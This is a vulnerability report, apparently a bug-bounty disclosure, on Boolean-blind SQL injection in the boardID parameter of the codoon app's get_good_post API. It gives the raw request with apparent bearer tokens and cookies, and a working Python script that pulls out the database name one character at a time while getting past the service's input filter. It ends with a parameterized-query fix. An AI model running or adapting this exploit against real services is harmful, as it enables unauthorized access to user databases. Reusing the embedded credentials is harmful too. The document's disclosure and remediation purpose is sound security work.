SQL injection in the official codoon app (spans 5 databases; includes a verification script that bypasses the filter)
Category: SQL injection / app security
Target: official codoon app
SQL injection was confirmed at the following location (the boardID parameter in the POST body; Boolean-based blind injection):
POST /api/get_good_post HTTP/1.1
Authorization: Bearer 48f9724bf93537d8f8fdc077858f086c
token: value
Content-Type: application/json
Content-Length: 109
X-Requested-With: XMLHttpRequest
Referer: http://api.codoon.com/api/get_good_post
Cookie: bduss=0JmPoJ58QRp09xPt_5AqCJ8xxMrrkvzN0k1bOkf8xMlcIvodpubYOkuH2olIivMi_av6o0NxSoJB93RGgu30MJ85SMJ48HOxlkSquliSSulqiSuqliS6ulioHu965maHliSquliqSulqiSuqliSquliqSulqiSuqliSquliqSulqiSuqliSquliqSulqiSuqliSquliqSulqiSuqliSquliqSulqiSuqliSquliqSulqiSuqraGFzgkvAj_3r3R7A
Host: api.codoon.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

{"boardID":"9","count":20,"offset":0,"userID":"b14e1d1d-9dc3-4105-8b12-f02f0a94de91"}
Because of the filtering, SQLMap does not detect it, so I wrote a Python script by hand (it dumps the current database name as an example; the program goes through a proxy):
#!/usr/bin/env python
#coding=utf8
# Python 2 script as posted in the report, restored to its original line structure.
import httplib, urllib, re, time

database = ''        # characters recovered so far (printable form)
temp_database = ''   # the same characters as a hex string for the LIKE 0x... prefix
httpClient = None
i = 33               # first printable ASCII character
while i < 128:
    if i == 37:      # skip '%' (0x25), which is the LIKE wildcard itself
        i = i + 1
    try:
        # Boolean-blind condition: does database() start with the known prefix plus this character? (0x25 = '%')
        params = '{"boardID":"9 AND database() like 0x' + temp_database + str(hex(i))[2:] + '25","count":20,"offset":0,"userID":"b14e1d1d-9dc3-4105-8b12-f02f0a94de91"}'
        headers = {
            "Host": "api.codoon.com",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
            "Accept-Encoding": "gzip,deflate",
            "Accept": "*/*",
            "Cookie": "JSESSIONID=4E4E004949665B956ADFF8315E7C3200",
            "Connection": "keep-alive",
            "Authorization": "Bearer 48f9724bf93537d8f8fdc077858f086c",
            "token": "value",
            "Content-Type": "application/json",
            "Content-Length": len(params),
        }
        # The request goes through a local proxy (192.168.222.202:8080) with an absolute request URL.
        httpClient = httplib.HTTPConnection("192.168.222.202", 8080, timeout=3)
        httpClient.request("POST", "http://api.codoon.com/api/get_good_post", params, headers)
        st = time.time()
        response = httpClient.getresponse()
        rp = response.read()
        # A "true" condition returns the post list (long body); "false" returns an empty result.
        if len(rp) > 100:
            temp_database = temp_database + str(hex(i))[2:]
            database = database + chr(i)
            print 'user(): ', database
            i = 33   # restart the character search for the next position
        i = i + 1
    except Exception, e:
        print e
    finally:
        if httpClient:
            httpClient.close()
1. Dumping the current database user
2. Dumping the current database name
3. Dumping all databases
4. Dumping the tables of the current database
Other data can be dumped in the same way; this report only verifies the issue and goes no deeper.
Solution:
Filter and validate the input.
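As an added illustration of the fix (example code, not from codoon or the report), the concatenation pattern that makes boardID injectable sits beside a handler that validates the JSON fields and binds them as query parameters; the in-memory posts table and its column names are assumptions.

```python
import json
import sqlite3

# Constructed in-memory stand-in for the table behind /api/get_good_post
# (the real schema is not on the page; table and column names are assumptions).
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE posts (id INTEGER, boardID INTEGER, title TEXT)")
_conn.executemany(
    "INSERT INTO posts VALUES (?, ?, ?)",
    [(1, 9, "board 9 post A"), (2, 9, "board 9 post B"), (3, 10, "board 10 post")],
)


def get_good_post_vulnerable(body):
    """Pastes boardID into the SQL text: the injectable pattern the report exploits.
    Any true/false condition appended to boardID changes whether rows come back,
    which is exactly the oracle a Boolean-blind script needs."""
    req = json.loads(body)
    sql = ("SELECT title FROM posts WHERE boardID = " + str(req["boardID"])
           + " ORDER BY id LIMIT " + str(int(req["count"]))
           + " OFFSET " + str(int(req["offset"])))
    return [row[0] for row in _conn.execute(sql)]


def get_good_post_fixed(body):
    """Validates each field and binds it as a parameter, so user data is never
    parsed as SQL syntax and the true/false oracle disappears."""
    req = json.loads(body)
    board_id = req.get("boardID")
    # The app sends boardID as a string; accept only a plain decimal integer.
    if not isinstance(board_id, str) or not board_id.isdigit():
        raise ValueError("boardID must be a decimal integer string")
    count, offset = req.get("count"), req.get("offset")
    for name, value in (("count", count), ("offset", offset)):
        if isinstance(value, bool) or not isinstance(value, int) or value < 0:
            raise ValueError(name + " must be a non-negative integer")
    rows = _conn.execute(
        "SELECT title FROM posts WHERE boardID = ? ORDER BY id LIMIT ? OFFSET ?",
        (int(board_id), min(count, 100), offset),
    )
    return [row[0] for row in rows]
```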